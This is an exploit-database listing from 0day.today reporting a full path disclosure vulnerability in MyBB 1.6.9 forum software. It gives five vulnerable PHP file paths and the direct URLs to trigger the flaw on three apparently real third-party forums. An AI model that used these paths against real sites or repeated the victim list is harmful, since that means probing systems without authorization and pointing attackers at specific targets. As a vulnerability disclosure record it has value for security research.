[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MyBB 1.6.9 full path disclosure

Author
cyb3rboy
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20007
Category
web applications
Date add
19-12-2012
Platform
windows
MyBB has released its update on 15th December. MyBB 1.6.9 is still affected with full path disclosure vulnerablity

author : cyb3rboy
website: freemium-devils.in
                  code104.net

greetz cyberace, ketan , shubham , S3v3n , th3 d3stroyer , amol

the following path was found vulnerable to full path disclosure

/inc/3rdparty/diff/Diff/Engine/xdiff.php
/inc/3rdparty/diff/Diff/Engine/native.php
/inc/3rdparty/diff/Diff/ThreeWay.php
/inc/3rdparty/diff/Diff/Renderer.php
/inc/3rdparty/diff/Diff/Mapped.php

http://netsoccer.eu/forum/inc/3rdparty/diff/Diff/Engine/xdiff.php
http://netsoccer.eu/forum/inc/3rdparty/diff/Diff/Engine/native.php
http://netsoccer.eu/forum//inc/3rdparty/diff/Diff/ThreeWay.php
http://netsoccer.eu/forum/inc/3rdparty/diff/Diff/Renderer.php
http://netsoccer.eu/forum/inc/3rdparty/diff/Diff/Mapped.php

http://shark007.net/forum/inc/3rdparty/diff/Diff/ThreeWay.php
http://shark007.net/forum//inc/3rdparty/diff/Diff/Mapped.php

http://www.mybbgm.com/inc/3rdparty/diff/Diff/Mapped.php
http://www.mybbgm.com/inc/3rdparty/diff/Diff/ThreeWay.php

#  0day.today [2024-09-28]  #